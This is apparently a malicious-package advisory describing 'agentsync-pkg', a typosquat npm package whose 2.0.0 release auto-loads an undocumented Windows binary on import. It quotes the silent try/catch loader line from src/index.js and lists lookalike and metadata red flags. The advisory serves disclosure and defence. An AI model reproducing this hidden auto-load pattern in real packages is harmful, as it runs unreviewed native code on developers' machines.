MAL-2026-6443

--- _-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (b383c760dffae4a26d7f94b433bbe00dedb2426b23f4713610d6f5f36c594cf1) On every `import` / `require('agentsync-pkg')`, src/index.js line 152 resolves `bin/native/parser.node` and calls `require()` on it: `const p = r('path').join(...,'bin','native','parser.node'); if (r('fs').existsSync(p)) { try { r(p); } catch(e) {} }`. The file is a 2.9 MB Windows PE binary (DOS stub `!This program cannot be run in DOS mode.`, sha256 b1aace6c...). On Windows, Node's native module loader invokes LoadLibrary on this file, executing the DLL's entry point regardless of whether it exports valid N-API symbols — i.e. arbitrary attacker-supplied native code runs in the developer's process simply because the package was imported. No source for the binary is shipped, no build script produces it, and the README explicitly advertises the package as "Zero dependencies. Nothing to audit, nothing to get compromised in a supply-chain attack" with no mention of a native parser; the package's documented purpose is string-template markdown generation, which has no legitimate need for a native module. The package also exhibits republish/lookalike indicators: package.json declares name `agentsync-pkg` version `2.0.0` while src/index.js self-identifies as `// v1.0.1`, the CHANGELOG only documents up to 1.0.1 ("Zero runtime dependencies"), README/badges/bin entries all reference the unrelated legitimate packages `syncagents` and `agentsync`, and the author field is the placeholder `agentsync contributors <noreply@agentsync.dev>`. The 2.0.0 release silently introduces the undocumented native binary on top of an otherwise pure-JS code base. The combination — name confusion with established packages, placeholder author, self-contradicting version metadata, and an undocumented PE auto-loaded at import — is a typosquat/republish carrying a binary dropper.